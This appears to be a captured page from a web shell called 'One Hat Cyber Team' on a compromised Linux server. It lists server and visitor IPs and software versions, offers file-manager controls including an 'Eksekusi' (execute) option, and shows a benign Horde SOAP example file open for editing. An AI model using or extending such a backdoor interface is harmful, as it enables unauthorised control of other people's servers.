⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-pear
/
pear
/
docs
/
Horde_Rpc
/
examples
/
Edit File: soap.php
<?php /** * @package Rpc */ die("Please configure the URL, username, and password, and then remove this line.\n"); // SOAP endpoint $rpc_endpoint = 'http://example.com/horde/rpc.php'; // SOAP method to call $rpc_method = 'calendar.listCalendars'; // SOAP options, usually username and password $rpc_options = array( 'login' => '', 'password' => '', 'namespace' => 'urn:horde', 'timeout' => 5, 'allowRedirects' => true, 'maxRedirects' => 3, 'location' => $rpc_endpoint, 'uri' => 'urn:horde', 'exceptions' => true, 'trace' => true, ); $soap = new SoapClient(null, $rpc_options); $result = Horde_Rpc::request( 'soap', $GLOBALS['rpc_endpoint'], $GLOBALS['rpc_method'], $soap, array()); var_dump($result);
Simpan